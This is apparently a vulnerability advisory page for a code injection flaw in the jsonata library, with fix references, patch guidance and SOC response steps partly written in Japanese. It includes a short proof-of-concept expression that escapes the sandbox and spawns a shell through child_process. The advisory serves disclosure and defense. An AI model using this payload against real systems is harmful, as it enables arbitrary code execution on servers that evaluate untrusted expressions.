Code Injection in jsonata (CVE-2026-77414)
Summary
Code injection in jsonata (CVE-2026-77414). Risk of unauthorized operations or information disclosure. Exploitable via hasOwnProperty. Mitigation: upgrade to 1.8.8 or later.
Original description
The description as published by the source.
Before JSONata 2.2.1 and 1.8.8 it was possible to execute arbitrary code with
crafted expressions, due to a bypassable hasOwnProperty check in
environment.lookup
https://github.com/jsonata-js/jsonata/blob/8ee4476f8a228bfc7a62979ae0a9c13a4043cd03/src/jsonata.js#L1863-L1871
This was fixed in https://github.com/jsonata-js/jsonata/pull/799
(https://github.com/jsonata-js/jsonata/pull/799/files#diff-de23c1b6e199d0e59406a284aae5fa7be63fcbbff706829913dba73dcdeb061cL1865-R1865)
which is included in the 2.2.1 release, and then back-ported to the 1.8.8 release.
PoC
import jsonata from "jsonata";
const expression = jsonata(`
(
$hasOwnProperty := $spread($string);
$__proto__ := $constructor;
$constructor("return
process.getBuiltinModule('child_process').execSync('sh',{stdio:'inherit'})")();
)`);
await expression.evaluate({});

CVE-2026-77414 (jsonata) — CWE-94
Attack surface: hasOwnProperty / environment.lookup
Patched: 1.8.8 — apply immediately
Plan: 1) Audit SBOM/dependencies, 2) Stage→prod upgrade, 3) Add WAF/proxy monitoring on affected endpoints, 4) Hunt IOCs in logs.
Refs: see the GHSA / vendor advisory / patched release linked on this page.
Arbitrary code execution (CWE-94) exists in jsonata. Attackers reach the vulnerable code path via hasOwnProperty.
Check the vendor advisory for the affected versions of jsonata. Attack surface: hasOwnProperty / environment.lookup.
Severity: ?. Risk of unauthorized operations or information disclosure.
Update to 1.8.8.
Until the patch is applied: disable the affected feature, apply WAF rules, or restrict access via network ACLs.
Search webserver/proxy logs for unusual request patterns matching this CVE's known IOCs. Run grep -r 'jsonata' . against your dependency files (package-lock.json, requirements.txt, go.sum) to find affected services.
Response actions
Concrete steps and command examples for SOC/SRE teams to execute in order
-
1Identify exposure identify
grep -r 'jsonata' . | grep -v node_modulesリポジトリと本番環境の依存ファイル (package-lock.json / requirements.txt / go.sum / Gemfile.lock 等) で
jsonataを grep し、稼働しているサービス・バージョンを把握する。 -
2Apply patch patch
Upgrade jsonata to 1.8.8ステージング環境で 1.8.8 に上げて回帰テスト → 本番反映。回帰テストはアプリの主要ハッピーパスを含めること。
-
3Post-deployment verification verify
Confirm patched version is live in productionパッチ適用後、ステージングで PoC または同等の悪用パターンを再現して脆弱性が閉じたことを確認。本番ではアクセスログ・WAF でアラート再発が無いか継続監視。
